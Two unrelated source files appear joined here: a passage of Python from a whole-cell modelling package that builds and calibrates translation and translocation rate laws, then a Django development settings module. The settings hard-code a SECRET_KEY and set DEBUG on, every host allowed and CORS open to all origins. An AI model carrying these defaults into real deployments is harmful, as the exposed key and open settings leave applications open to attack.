                            trna_functions['m'][i] = {
                                'function': trna_factor_function,
                                'aa': trna_functions['c'][i]['aa'],
                                'objects': added_objects,
                                }
                            matched_trnas = [trna_functions[translation_compartment.id][i]]
                    for codon_info in matched_trnas:
                        expression_terms.append(codon_info['function'].id)
                        objects[wc_lang.Function][codon_info['function'].id] = codon_info['function']
                        for cl, dictionary in objects.items():
                            dictionary.update(codon_info['objects'][cl])

        # Add one amino-acid response term per amino acid actually used;
        # selenocysteine ('U') is counted via serine ('S') and tallied in
        # selcys so selenophosphate can be added below.
        selcys = 0
        for key, value in gvar.protein_aa_usage[mrna_kb.protein.id].items():
            aa_id = 'S' if key=='U' else key
            if aa_id in amino_acid_id_conversion and value:
                selcys += 1 if key=='U' else 0
                aa_met = amino_acid_id_conversion[aa_id]
                # Skip if the only occurrence is the start amino acid,
                # which is consumed by initiation.
                if aa_met==start_aa_met and value-1==0:
                    pass
                else:
                    if aa_functions[translation_compartment.id][aa_met][
                            'function'].id not in expression_terms:
                        expression_terms.append(aa_functions[translation_compartment.id][
                            aa_met]['function'].id)
                        objects[wc_lang.Function][aa_functions[translation_compartment.id][
                            aa_met]['function'].id] = aa_functions[translation_compartment.id][
                            aa_met]['function']
                        for cl, dictionary in objects.items():
                            dictionary.update(aa_functions[translation_compartment.id][
                                aa_met]['objects'][cl])

        other_mets = [['gtp'], ['atp']] + ([['selnp']] if selcys else [])
        expressions, all_species, all_parameters, all_volumes, all_observables = utils.gen_response_functions(
            model, beta, elongation_reaction.id, 'translation_elongation', translation_compartment, other_mets)
        expression_terms += expressions
        objects[wc_lang.Species].update(all_species)
        objects[wc_lang.Parameter].update(all_parameters)
        objects[wc_lang.Function].update(all_volumes)
        objects[wc_lang.Observable].update(all_observables)

        ribo_bound_species = model.species_types.get_one(id='ribo_bound_{}'.format(mrna_kb.id)).species[0]
        objects[wc_lang.Species][ribo_bound_species.id] = ribo_bound_species

        k_cat_elongation = model.parameters.create(
            id='k_cat_{}'.format(elongation_reaction.id),
            type=wc_ontology['WC:k_cat'],
            units=unit_registry.parse_units('molecule^-1 s^-1'),
            )
        objects[wc_lang.Parameter][k_cat_elongation.id] = k_cat_elongation

        expression = '{} * {} * {} * 2**{}'.format(
            k_cat_elongation.id,
            ribo_bound_species.id,
            ' * '.join(expression_terms),
            len(expression_terms),
            )

        el_rate_law_expression, error = wc_lang.RateLawExpression.deserialize(expression, objects)
        assert error is None, str(error)

        # NOTE(review): unlike the initiation rate law above, no explicit
        # units are passed here — confirm the wc_lang default is intended.
        el_rate_law = model.rate_laws.create(
            direction=wc_lang.RateLawDirection.forward,
            type=None,
            expression=el_rate_law_expression,
            reaction=elongation_reaction,
            )
        el_rate_law.id = el_rate_law.gen_id()

        rate_law_no += 1

    # Generate rate law for translocation
    trans_rxn_no = 0
    for reaction in self.submodel.reactions:
        if 'translocation' in reaction.id:
            # NOTE(review): reaction ids are parsed positionally as
            # 'translocation_<protein>_<src>_to_<dst>'; this assumes
            # protein ids contain no underscores — confirm.
            translation_compartment = model.compartments.get_one(id=reaction.id.split('_')[2])
            target_compartment_id = '_'.join(reaction.id.split('_')[4:])

            if target_compartment_id=='n':
                energy_compartment = nucleus
                energy_reactant = 'gtp'
                chaperones = []
            elif target_compartment_id=='m':
                energy_compartment = mitochondrion
                energy_reactant = 'atp'
                chaperones = mitochondrial_chaperones
                chaperone_compartment = mitochondrion
            elif target_compartment_id=='x':
                energy_compartment = peroxisome
                energy_reactant = 'atp'
                chaperones = []
            else:
                energy_compartment = cytosol
                energy_reactant = 'gtp'
                chaperones = er_chaperones
                chaperone_compartment = er

            objects = {
                wc_lang.Species: {},
                wc_lang.Parameter: {},
                wc_lang.Observable: {},
                wc_lang.Function: {},
                }

            expression_terms = []
            for factor in chaperones:
                factor_details = trans_factor_functions[chaperone_compartment.id][','.join(factor)]
                expression_terms.append(factor_details['function'].id)
                for cl, dictionary in objects.items():
                    dictionary.update(factor_details['objects'][cl])
                objects[wc_lang.Function][factor_details['function'].id] = factor_details['function']

            expressions, all_species, all_parameters, all_volumes, all_observables = utils.gen_response_functions(
                model, beta, reaction.id, 'translocation', energy_compartment, [[energy_reactant]])
            expression_terms += expressions
            objects[wc_lang.Species].update(all_species)
            objects[wc_lang.Parameter].update(all_parameters)
            objects[wc_lang.Function].update(all_volumes)
            objects[wc_lang.Observable].update(all_observables)

            k_cat_translocation = model.parameters.create(
                id='k_cat_{}'.format(reaction.id),
                type=wc_ontology['WC:k_cat'],
                units=unit_registry.parse_units('molecule^-1 s^-1'),
                )
            objects[wc_lang.Parameter][k_cat_translocation.id] = k_cat_translocation

            protein_species = model.species_types.get_one(
                id=reaction.id.split('_')[1]).species.get_one(compartment=translation_compartment)
            objects[wc_lang.Species][protein_species.id] = protein_species

            # The compartment volume function is registered in `objects`
            # although the expression string below does not reference it.
            volume = translation_compartment.init_density.function_expressions[0].function
            objects[wc_lang.Function][volume.id] = volume

            expression = '{} * {} * {} * 2**{}'.format(
                k_cat_translocation.id,
                protein_species.id,
                ' * '.join(expression_terms),
                len(expression_terms),
                )

            trans_rate_law_expression, error = wc_lang.RateLawExpression.deserialize(expression, objects)
            assert error is None, str(error)

            trans_rate_law = model.rate_laws.create(
                direction=wc_lang.RateLawDirection.forward,
                type=None,
                expression=trans_rate_law_expression,
                reaction=reaction,
                )
            trans_rate_law.id = trans_rate_law.gen_id()

            trans_rxn_no += 1

    # rate_law_no counts mRNAs, and one initiation plus one elongation rate
    # law is made per mRNA, so the same count is reported for both.
    print('{} rate laws for initiation reactions, {} rate laws for elongation '
        'reactions and {} rate laws for translocation reactions have been generated'.format(
            rate_law_no, rate_law_no, trans_rxn_no))
def calibrate_submodel(self):
    """ Calibrate the submodel using data in the KB

    For each mRNA transcript this sets:
      * the initial concentration of its ribosome-bound site (and debits the
        free cytoplasmic/mitochondrial ribosome pools accordingly),
      * the K_m of every rate-law substrate (beta times its initial
        concentration, or 1e-05 when the concentration is zero),
      * the k_cat of the initiation, elongation and translocation reactions,
        chosen so the initial flux of each reaction equals the average
        protein synthesis rate implied by total protein concentration,
        protein half-life and the cell doubling time.
    k_cat values that cannot be determined (rate law evaluates to zero) are
    backfilled with the median of the determined values, or 1 as a last resort.
    """
    model = self.model
    cell = self.knowledge_base.cell

    nucleus = model.compartments.get_one(id='n')
    mitochondrion = model.compartments.get_one(id='m')
    cytosol = model.compartments.get_one(id='c')
    peroxisome = model.compartments.get_one(id='x')
    er = model.compartments.get_one(id='r')

    # NOTE(review): values are mean volume * density, i.e. masses; presumably
    # this is the form wc_lang rate-law evaluation expects for compartments —
    # confirm against wc_lang's eval conventions.
    init_compartment_volumes = {
        nucleus.id: nucleus.init_volume.mean * nucleus.init_density.value,
        mitochondrion.id: mitochondrion.init_volume.mean * mitochondrion.init_density.value,
        cytosol.id: cytosol.init_volume.mean * cytosol.init_density.value,
        peroxisome.id: peroxisome.init_volume.mean * peroxisome.init_density.value,
        er.id: er.init_volume.mean * er.init_density.value,
        }

    beta = self.options.get('beta')
    polysome_fraction = self.options['polysome_fraction']

    cytoplasmic_ribosome = self.options.get('cytoplasmic_ribosome')
    mitochondrial_ribosome = self.options.get('mitochondrial_ribosome')
    cytoplasmic_ribosome_species = model.species_types.get_one(
        name=cytoplasmic_ribosome).species.get_one(compartment=cytosol)
    mitochondrial_ribosome_species = model.species_types.get_one(
        name=mitochondrial_ribosome).species.get_one(compartment=mitochondrion)

    Avogadro = self.model.parameters.get_or_create(
        id='Avogadro',
        type=None,
        value=scipy.constants.Avogadro,
        units=unit_registry.parse_units('molecule mol^-1'))

    mean_doubling_time = model.parameters.get_one(id='mean_doubling_time').value

    # All mRNA transcripts in the knowledge base.
    mrna_kbs = [i for i in cell.species_types.get(__type=wc_kb.eukaryote.TranscriptSpeciesType) \
        if i.type==wc_kb.eukaryote.TranscriptType.mRna]

    # Determine initial concentrations of ribosome bound sites and update the concentrations of free ribosomes
    cytoplasmic_bound_ribosomes = 0
    mitochondrial_bound_ribosomes = 0
    for mrna_kb in mrna_kbs:
        mrna_kb_compartment_id = mrna_kb.species[0].compartment.id
        # polysome_fraction gives, per transcript, the fraction of the
        # relevant ribosome pool bound to that transcript.
        if mrna_kb_compartment_id == 'c':
            ribo_bound_conc = polysome_fraction[mrna_kb.id] * \
                cytoplasmic_ribosome_species.distribution_init_concentration.mean
            cytoplasmic_bound_ribosomes += ribo_bound_conc
        else:
            ribo_bound_conc = polysome_fraction[mrna_kb.id] * \
                mitochondrial_ribosome_species.distribution_init_concentration.mean
            mitochondrial_bound_ribosomes += ribo_bound_conc
        ribo_bound_species = model.species_types.get_one(id='ribo_bound_{}'.format(
            mrna_kb.id)).species[0]
        ribo_bound_species.distribution_init_concentration.mean = ribo_bound_conc
    # Free ribosome pools are whatever remains after binding to transcripts.
    cytoplasmic_ribosome_species.distribution_init_concentration.mean -= cytoplasmic_bound_ribosomes
    mitochondrial_ribosome_species.distribution_init_concentration.mean -= mitochondrial_bound_ribosomes

    # Calibrate initiation and elongation reactions
    determined_init_kcat = []
    undetermined_init_kcat = []
    determined_el_kcat = []
    undetermined_el_kcat = []
    determined_transloc_kcat = []
    undetermined_transloc_kcat = []
    for mrna_kb in mrna_kbs:
        mrna_kb_compartment_id = mrna_kb.species[0].compartment.id
        ribosome_complex = cytoplasmic_ribosome_species if mrna_kb_compartment_id == 'c' else mitochondrial_ribosome_species

        protein_model = model.species_types.get_one(id=mrna_kb.protein.id)
        # Stoichiometric coefficient of this protein in every complex that
        # contains it, keyed by the complex species type.
        complex_model_stoic = {model.species_types.get_one(id=i.id):j.coefficient for i in cell.species_types.get(
            __type=wc_kb.core.ComplexSpeciesType) for j in i.subunits if j.species_type==mrna_kb.protein}

        # Total protein = free protein in all compartments plus protein bound
        # in complexes, weighted by stoichiometry.
        total_concentration = sum([i.distribution_init_concentration.mean for i in protein_model.species]) + \
            sum([i.distribution_init_concentration.mean*v for k,v in complex_model_stoic.items() for i in k.species \
                if i.distribution_init_concentration])

        half_life = mrna_kb.protein.properties.get_one(property='half-life').get_value()
        # Average synthesis rate required to sustain total_concentration
        # against degradation (half-life) and dilution (doubling time).
        average_rate = utils.calc_avg_syn_rate(
            total_concentration, half_life, mean_doubling_time)

        # Calibrate initiation reaction
        init_reaction = model.reactions.get_one(id='translation_initiation_' + mrna_kb.id)

        # Species counts used to evaluate the rate law below; K_m of each
        # substrate is set while collecting them.
        init_species_counts = {}
        init_species_counts[ribosome_complex.id] = ribosome_complex.distribution_init_concentration.mean
        init_species_counts[self._allowable_queue_len[mrna_kb.id][0].id] = self._allowable_queue_len[mrna_kb.id][1]

        for species in init_reaction.rate_laws[0].expression.species:
            init_species_counts[species.id] = species.distribution_init_concentration.mean
            model_Km = model.parameters.get_one(
                id='K_m_{}_{}'.format(init_reaction.id, species.species_type.id))
            if model_Km:
                if species.distribution_init_concentration.mean:
                    model_Km.value = beta * species.distribution_init_concentration.mean \
                        / Avogadro.value / species.compartment.init_volume.mean
                    model_Km.comments = 'The value was assumed to be {} times the concentration of {} in {}'.format(
                        beta, species.species_type.id, species.compartment.name)
                else:
                    model_Km.value = 1e-05
                    model_Km.comments = 'The value was assigned to 1e-05 because the concentration of ' +\
                        '{} in {} was zero'.format(species.species_type.id, species.compartment.name)

        # Species referenced indirectly through functions and observables
        # also need counts for the evaluation below.
        for func in init_reaction.rate_laws[0].expression.functions:
            for species in func.expression.species:
                init_species_counts[species.id] = species.distribution_init_concentration.mean
            for obs in func.expression.observables:
                for species in obs.expression.species:
                    init_species_counts[species.id] = species.distribution_init_concentration.mean

        model_kcat = model.parameters.get_one(id='{}_ribosome_binding_constant'.format(mrna_kb.id))
        if average_rate:
            # Evaluate the rate law with k_cat = 1, then scale k_cat so the
            # initial flux equals the required average synthesis rate.
            model_kcat.value = 1.
            eval_rate_law = init_reaction.rate_laws[0].expression._parsed_expression.eval({
                wc_lang.Species: init_species_counts,
                wc_lang.Compartment: init_compartment_volumes,
                })
            if eval_rate_law:
                model_kcat.value = average_rate / eval_rate_law
                determined_init_kcat.append(model_kcat.value)
            else:
                # Rate law evaluated to zero; backfilled with the median below.
                undetermined_init_kcat.append(model_kcat)
        else:
            model_kcat.value = 0.

        # Calibrate elongation reaction (same procedure as initiation).
        el_reaction = model.reactions.get_one(id='translation_elongation_' + mrna_kb.id)

        el_species_counts = {}
        for species in el_reaction.rate_laws[0].expression.species:
            el_species_counts[species.id] = species.distribution_init_concentration.mean
            model_Km = model.parameters.get_one(
                id='K_m_{}_{}'.format(el_reaction.id, species.species_type.id))
            if model_Km:
                if species.distribution_init_concentration.mean:
                    model_Km.value = beta * species.distribution_init_concentration.mean \
                        / Avogadro.value / species.compartment.init_volume.mean
                    model_Km.comments = 'The value was assumed to be {} times the concentration of {} in {}'.format(
                        beta, species.species_type.id, species.compartment.name)
                else:
                    model_Km.value = 1e-05
                    model_Km.comments = 'The value was assigned to 1e-05 because the concentration of ' +\
                        '{} in {} was zero'.format(species.species_type.id, species.compartment.name)

        for func in el_reaction.rate_laws[0].expression.functions:
            for species in func.expression.species:
                el_species_counts[species.id] = species.distribution_init_concentration.mean
            for obs in func.expression.observables:
                for species in obs.expression.species:
                    el_species_counts[species.id] = species.distribution_init_concentration.mean

        model_kcat = model.parameters.get_one(id='k_cat_{}'.format(el_reaction.id))
        if average_rate:
            model_kcat.value = 1.
            eval_rate_law = el_reaction.rate_laws[0].expression._parsed_expression.eval({
                wc_lang.Species: el_species_counts,
                wc_lang.Compartment: init_compartment_volumes,
                })
            if eval_rate_law:
                model_kcat.value = average_rate / eval_rate_law
                determined_el_kcat.append(model_kcat.value)
            else:
                undetermined_el_kcat.append(model_kcat)
        else:
            model_kcat.value = 0.

        # Calibrate translocation reaction
        # Total concentration of this protein per compartment (free protein
        # plus protein bound in complexes).
        conc_per_comp = {}
        for protein in protein_model.species:
            conc_per_comp[protein.compartment] = protein.distribution_init_concentration.mean
        for cplx_st, stoic in complex_model_stoic.items():
            for cplx_species in cplx_st.species:
                if cplx_species.distribution_init_concentration:
                    if cplx_species.compartment in conc_per_comp:
                        conc_per_comp[cplx_species.compartment] += stoic * \
                            cplx_species.distribution_init_concentration.mean
                    else:
                        conc_per_comp[cplx_species.compartment] = stoic * \
                            cplx_species.distribution_init_concentration.mean

        translation_compartment = cytosol if mrna_kb_compartment_id == 'c' else mitochondrion

        for compartment, trans_reaction in self._translocation_reactions[mrna_kb].items():
            trans_species_counts = {}

            for species in trans_reaction.rate_laws[0].expression.species:
                trans_species_counts[species.id] = species.distribution_init_concentration.mean
                model_Km = model.parameters.get_one(
                    id='K_m_{}_{}'.format(trans_reaction.id, species.species_type.id))
                if model_Km:
                    if species.distribution_init_concentration.mean:
                        model_Km.value = beta * species.distribution_init_concentration.mean \
                            / Avogadro.value / species.compartment.init_volume.mean
                        model_Km.comments = 'The value was assumed to be {} times the concentration of {} in {}'.format(
                            beta, species.species_type.id, species.compartment.name)
                    else:
                        model_Km.value = 1e-05
                        model_Km.comments = 'The value was assigned to 1e-05 because the concentration of ' +\
                            '{} in {} was zero'.format(species.species_type.id, species.compartment.name)

            for func in trans_reaction.rate_laws[0].expression.functions:
                for species in func.expression.species:
                    trans_species_counts[species.id] = species.distribution_init_concentration.mean
                for obs in func.expression.observables:
                    for species in obs.expression.species:
                        trans_species_counts[species.id] = species.distribution_init_concentration.mean

            model_kcat = model.parameters.get_one(id='k_cat_{}'.format(trans_reaction.id))
            if average_rate:
                model_kcat.value = 1.
                eval_rate_law = trans_reaction.rate_laws[0].expression._parsed_expression.eval({
                    wc_lang.Species: trans_species_counts,
                    wc_lang.Compartment: init_compartment_volumes,
                    })
                if eval_rate_law:
                    # Scale by the fraction of this protein residing in the
                    # destination compartment relative to where it is made.
                    model_kcat.value = conc_per_comp[compartment] / conc_per_comp[translation_compartment] * \
                        average_rate / eval_rate_law
                    determined_transloc_kcat.append(model_kcat.value)
                else:
                    undetermined_transloc_kcat.append(model_kcat)
            else:
                model_kcat.value = 0.

    # Backfill undetermined k_cat values with the median of the determined
    # ones; numpy.median of an empty list is NaN, in which case fall back to 1.
    median_init_kcat = numpy.median(determined_init_kcat)
    if not numpy.isnan(median_init_kcat):
        for model_kcat in undetermined_init_kcat:
            model_kcat.value = median_init_kcat
            model_kcat.comments = 'Set to the median value because it could not be determined from data'
    else:
        for model_kcat in undetermined_init_kcat:
            model_kcat.value = 1.
            model_kcat.comments = 'Set to 1 because it could not be determined from median value'

    median_el_kcat = numpy.median(determined_el_kcat)
    if not numpy.isnan(median_el_kcat):
        for model_kcat in undetermined_el_kcat:
            model_kcat.value = median_el_kcat
            model_kcat.comments = 'Set to the median value because it could not be determined from data'
    else:
        for model_kcat in undetermined_el_kcat:
            model_kcat.value = 1.
            model_kcat.comments = 'Set to 1 because it could not be determined from median value'

    median_transloc_kcat = numpy.median(determined_transloc_kcat)
    if not numpy.isnan(median_transloc_kcat):
        for model_kcat in undetermined_transloc_kcat:
            model_kcat.value = median_transloc_kcat
            model_kcat.comments = 'Set to the median value because it could not be determined from data'
    else:
        for model_kcat in undetermined_transloc_kcat:
            model_kcat.value = 1.
            model_kcat.comments = 'Set to 1 because it could not be determined from median value'
def _import_cytosolic_trna_into_mitochondria(self, cytosolic_trna_ids):
    """ Create reactions and rate laws for importing cytosolic tRNAs into the mitochondria.

    The concentrations of imported tRNAs in the mitochondria are set based on
    the provided fraction and the rates of transport are calibrated accordingly to achieve
    steady-states.

    For each tRNA that does not yet have a mitochondrial species, this:
      1. splits the total concentration between cytosol and mitochondria by
         the ``mitochondrial_cytosolic_trna_partition`` option;
      2. creates a mass-action-like import reaction and calibrates its rate
         constant so import balances mitochondrial degradation;
      3. creates a mitochondrial degradation reaction (hydrolysis into NMPs)
         and calibrates its k_cat so total degradation matches the rate
         implied by the tRNA half-life.

    Args:
        cytosolic_trna_ids (:obj:`list`): list of species type IDs of cytosolic tRNAs to be
            imported into the mitochondria
    """
    kb = self.knowledge_base
    model = self.model
    # NOTE(review): `submodel` is assigned but unused; `self.submodel` is
    # referenced directly below.
    submodel = self.submodel

    beta = self.options['beta']
    mitochondrial_cytosolic_trna_partition = self.options['mitochondrial_cytosolic_trna_partition']
    mitochondrial_exosome = self.options['mitochondrial_exosome']

    cytosol = model.compartments.get_one(id='c')
    mitochondria = model.compartments.get_one(id='m')

    rna_deg_submodel = model.submodels.get_one(id='rna_degradation')
    exosome_species = model.species_types.get_one(
        name=mitochondrial_exosome).species.get_one(compartment=mitochondria)

    Avogadro = model.parameters.get_or_create(
        id='Avogadro',
        type=None,
        value=scipy.constants.Avogadro,
        units=unit_registry.parse_units('molecule mol^-1'))

    for trna_id in cytosolic_trna_ids:
        trna_species_type = model.species_types.get_one(id=trna_id)
        # Skip tRNAs that already have a mitochondrial species.
        if not trna_species_type.species.get_one(compartment=mitochondria):
            # Partition the total cellular concentration between cytosol
            # and mitochondria according to the configured fraction.
            cyto_trna_species = trna_species_type.species.get_one(compartment=cytosol)
            total_conc = cyto_trna_species.distribution_init_concentration.mean
            cyto_trna_species.distribution_init_concentration.mean = total_conc * \
                (1 - mitochondrial_cytosolic_trna_partition)
            cyto_trna_species.distribution_init_concentration.comments = \
                'Value is adjusted to account for import into the mitochondria'

            mito_trna_species = model.species.get_or_create(
                species_type=trna_species_type, compartment=mitochondria)
            mito_trna_species.id = mito_trna_species.gen_id()
            conc_model = model.distribution_init_concentrations.create(
                species=mito_trna_species,
                mean=total_conc * mitochondrial_cytosolic_trna_partition,
                units=unit_registry.parse_units('molecule'),
                comments='Value is set to {} of the total cellular concentration'.format(
                    mitochondrial_cytosolic_trna_partition),
                )
            conc_model.id = conc_model.gen_id()

            # Generate import reaction (cytosolic tRNA -> mitochondrial tRNA)
            import_reaction = model.reactions.create(
                submodel=self.submodel, id='trna_import_{}'.format(trna_id),
                name='import of {} into the mitochondria'.format(trna_id),
                reversible=False)
            import_reaction.participants.append(
                cyto_trna_species.species_coefficients.get_or_create(coefficient=-1))
            import_reaction.participants.append(
                mito_trna_species.species_coefficients.get_or_create(coefficient=1))

            # Generate rate law for import reaction:
            # mass-action-like, constant * cytosolic tRNA count.
            import_constant = model.parameters.create(
                id='{}_import_constant'.format(trna_id),
                type=None,
                units=unit_registry.parse_units('molecule^-1 s^-1'),
                )
            expression = '{} * {}'.format(import_constant.id, cyto_trna_species.id)
            import_rate_law_expression, error = wc_lang.RateLawExpression.deserialize(expression, {
                wc_lang.Species: {cyto_trna_species.id: cyto_trna_species},
                wc_lang.Parameter: {import_constant.id: import_constant},
                })
            assert error is None, str(error)
            import_rate_law = model.rate_laws.create(
                direction=wc_lang.RateLawDirection.forward,
                type=None,
                expression=import_rate_law_expression,
                reaction=import_reaction,
                units=unit_registry.parse_units('s^-1'),
                )
            import_rate_law.id = import_rate_law.gen_id()

            # Calibrate import rate: evaluate the rate law with constant = 1,
            # then scale so import sustains the mitochondrial partition at
            # steady state.
            rna_kb = kb.cell.species_types.get_one(id=trna_id)
            half_life = rna_kb.properties.get_one(property='half-life').get_value()
            mean_doubling_time = model.parameters.get_one(id='mean_doubling_time').value
            average_rate = utils.calc_avg_syn_rate(
                total_conc, half_life, mean_doubling_time)
            import_constant.value = 1.
            eval_rate_law = import_rate_law_expression._parsed_expression.eval({
                wc_lang.Species: {cyto_trna_species.id: total_conc * \
                    (1 - mitochondrial_cytosolic_trna_partition)}
                })
            if eval_rate_law:
                import_constant.value = mitochondrial_cytosolic_trna_partition / \
                    (1 - mitochondrial_cytosolic_trna_partition) * \
                    average_rate / eval_rate_law
            else:
                import_constant.value = 0.

            # Generate degradation reaction for imported tRNA
            metabolic_participants = ['amp', 'cmp', 'gmp', 'ump', 'h2o', 'h']
            metabolites = {}
            for met in metabolic_participants:
                met_species_type = model.species_types.get_one(id=met)
                metabolites[met] = met_species_type.species.get_or_create(
                    compartment=mitochondria, model=model)

            reaction = model.reactions.get_or_create(submodel=rna_deg_submodel,
                id='degradation_{}_{}'.format(trna_id, mitochondria.id))
            reaction.name = 'degradation of {} in mitochondria'.format(trna_species_type.name)

            # Cache the transcript's nucleotide composition in the shared
            # gvar table so the sequence is only counted once per transcript.
            if trna_id in gvar.transcript_ntp_usage:
                ntp_count = gvar.transcript_ntp_usage[trna_id]
            else:
                seq = rna_kb.get_seq()
                ntp_count = gvar.transcript_ntp_usage[trna_id] = {
                    'A': seq.upper().count('A'),
                    'C': seq.upper().count('C'),
                    'G': seq.upper().count('G'),
                    'U': seq.upper().count('U'),
                    'len': len(seq)
                    }

            # Adding participants to LHS
            reaction.participants.append(mito_trna_species.species_coefficients.get_or_create(
                coefficient=-1))
            # Hydrolysis consumes one water per phosphodiester bond (len - 1).
            reaction.participants.append(metabolites['h2o'].species_coefficients.get_or_create(
                coefficient=-(ntp_count['len']-1)))

            # Adding participants to RHS
            reaction.participants.append(metabolites['amp'].species_coefficients.get_or_create(
                coefficient=ntp_count['A']))
            reaction.participants.append(metabolites['cmp'].species_coefficients.get_or_create(
                coefficient=ntp_count['C']))
            reaction.participants.append(metabolites['gmp'].species_coefficients.get_or_create(
                coefficient=ntp_count['G']))
            reaction.participants.append(metabolites['ump'].species_coefficients.get_or_create(
                coefficient=ntp_count['U']))
            reaction.participants.append(metabolites['h'].species_coefficients.get_or_create(
                coefficient=ntp_count['len']-1))

            # Generate rate law for degradation reaction of imported tRNA
            rate_law_exp, _ = utils.gen_michaelis_menten_like_rate_law(
                model, reaction, modifiers=[exosome_species],
                exclude_substrates=[metabolites['h2o']])
            rate_law = model.rate_laws.create(
                direction=wc_lang.RateLawDirection.forward,
                type=None,
                expression=rate_law_exp,
                reaction=reaction,
                )
            rate_law.id = rate_law.gen_id()

            # Calibrate degradation reaction of imported tRNA.
            # Mitochondrial degradation rate is the total degradation rate
            # minus what the existing cytosolic reaction already accounts for.
            cyto_deg_reaction = rna_deg_submodel.reactions.get_one(id='degradation_' + rna_kb.id)
            cyto_species_counts = {species.id: species.distribution_init_concentration.mean \
                for species in cyto_deg_reaction.rate_laws[0].expression.species}
            cyto_deg_rate = cyto_deg_reaction.rate_laws[0].expression._parsed_expression.eval({
                wc_lang.Species: cyto_species_counts,
                wc_lang.Compartment: {
                    cytosol.id: cytosol.init_volume.mean * \
                    cytosol.init_density.value}
                })
            total_deg_rate = utils.calc_avg_deg_rate(total_conc, half_life)
            mito_deg_rate = total_deg_rate - cyto_deg_rate

            # Collect counts for evaluating the mitochondrial rate law and
            # set substrate K_m values as for the other calibrations.
            mito_species_counts = {exosome_species.id: exosome_species.distribution_init_concentration.mean}
            for species in reaction.get_reactants():
                mito_species_counts[species.id] = species.distribution_init_concentration.mean
                if model.parameters.get(id='K_m_{}_{}'.format(reaction.id, species.species_type.id)):
                    model_Km = model.parameters.get_one(
                        id='K_m_{}_{}'.format(reaction.id, species.species_type.id))
                    if species.distribution_init_concentration.mean:
                        model_Km.value = beta * species.distribution_init_concentration.mean \
                            / Avogadro.value / species.compartment.init_volume.mean
                        model_Km.comments = 'The value was assumed to be {} times the concentration of {} in {}'.format(
                            beta, species.species_type.id, species.compartment.name)
                    else:
                        model_Km.value = 1e-05
                        model_Km.comments = 'The value was assigned to 1e-05 because the concentration of ' +\
                            '{} in {} was zero'.format(species.species_type.id, species.compartment.name)

            model_kcat = model.parameters.get_one(id='k_cat_{}'.format(reaction.id))
            if mito_deg_rate:
                # Evaluate with k_cat = 1, then scale to hit mito_deg_rate.
                model_kcat.value = 1.
                eval_rate_law = reaction.rate_laws[0].expression._parsed_expression.eval({
                    wc_lang.Species: mito_species_counts,
                    wc_lang.Compartment: {
                        mitochondria.id: mitochondria.init_volume.mean * \
                        mitochondria.init_density.value}
                    })
                if eval_rate_law:
                    model_kcat.value = mito_deg_rate / eval_rate_law
                else:
                    model_kcat.value = 0.
            else:
                model_kcat.value = 0.
|
"""
Django settings for creator project.
Generated by 'django-admin startproject' using Django 2.1.7.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
from creator.settings.features import *
from corsheaders.defaults import default_headers
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))

# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/

# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is hard-coded; presumably this module is only the
# development settings profile (STAGE = "dev" below) — confirm that
# production uses a different settings module with a secret from the env.
SECRET_KEY = "q$ol+cu=#pp=bgni6d7rn$+$07(!q8g_=aep0w_n+rkhy5q060"

# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True

# Adds development endpoints to the application.
# This should never be enabled in actual deployments
DEVELOPMENT_ENDPOINTS = os.environ.get("DEVELOPMENT_ENDPOINTS", False)

STAGE = "dev"

ALLOWED_HOSTS = ["*"]

# CORS is wide open for development; the extra header allows Sentry's
# distributed-tracing header on cross-origin requests.
CORS_ORIGIN_ALLOW_ALL = True
CORS_ALLOW_HEADERS = list(default_headers) + [
    "sentry-trace",
]

DEVELOP = True

# Application definition

INSTALLED_APPS = [
    "django.contrib.admin",
    "django.contrib.auth",
    "django.contrib.contenttypes",
    "django.contrib.sessions",
    "django.contrib.messages",
    "django.contrib.staticfiles",
    "graphene_django",
    "django_s3_storage",
    "django_rq",
    "creator.analyses",
    "creator.dev",
    "creator.files",
    "creator.status",
    "creator.studies",
    "creator.users",
    "creator.projects",
    "creator.buckets",
    "creator.email",
    "creator.referral_tokens",
    "creator.extract_configs",
    "creator.jobs",
    "creator.releases",
    "creator.data_reviews",
    "creator.events.apps.EventsConfig",
    "creator.organizations",
    "creator.data_templates",
    "creator",
    "corsheaders",
    "creator.ingest_runs.apps.IngestRunsConfig",
]

# CorsMiddleware must come before CommonMiddleware so CORS headers are
# added to all responses, including redirects.
MIDDLEWARE = [
    "django.middleware.security.SecurityMiddleware",
    "django.contrib.sessions.middleware.SessionMiddleware",
    "corsheaders.middleware.CorsMiddleware",
    "django.middleware.common.CommonMiddleware",
    "django.middleware.csrf.CsrfViewMiddleware",
    "django.contrib.auth.middleware.AuthenticationMiddleware",
    "creator.middleware.Auth0AuthenticationMiddleware",
    "django.contrib.messages.middleware.MessageMiddleware",
    "django.middleware.clickjacking.XFrameOptionsMiddleware",
]

ROOT_URLCONF = "creator.urls"

TEMPLATES = [
    {
        "BACKEND": "django.template.backends.django.DjangoTemplates",
        "DIRS": [],
        "APP_DIRS": True,
        "OPTIONS": {
            "context_processors": [
                "django.template.context_processors.debug",
                "django.template.context_processors.request",
                "django.contrib.auth.context_processors.auth",
                "django.contrib.messages.context_processors.messages",
            ]
        },
    }
]

WSGI_APPLICATION = "creator.wsgi.application"

# graphene-django GraphQL configuration.
GRAPHENE = {
    "SCHEMA": "creator.schema.schema",
    "MIDDLEWARE": ["graphene_django.debug.DjangoDebugMiddleware"],
    "RELAY_CONNECTION_MAX_LIMIT": 250,
}
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
# Connection parameters come from the environment with local-dev defaults.
DATABASES = {
    "default": {
        "ENGINE": "django.db.backends.postgresql",
        "NAME": os.environ.get("PG_NAME", "postgres"),
        "USER": os.environ.get("PG_USER", "postgres"),
        "PASSWORD": os.environ.get("PG_PASS", "postgres"),
        "HOST": os.environ.get("PG_HOST", "127.0.0.1"),
        "PORT": os.environ.get("PG_PORT", "5432"),
    }
}

# In-process cache; suitable for a single development process only.
CACHES = {
    "default": {"BACKEND": "django.core.cache.backends.locmem.LocMemCache"}
}
# Redis for RQ
redis_host = os.environ.get("REDIS_HOST", "localhost")
redis_port = os.environ.get("REDIS_PORT", 6379)
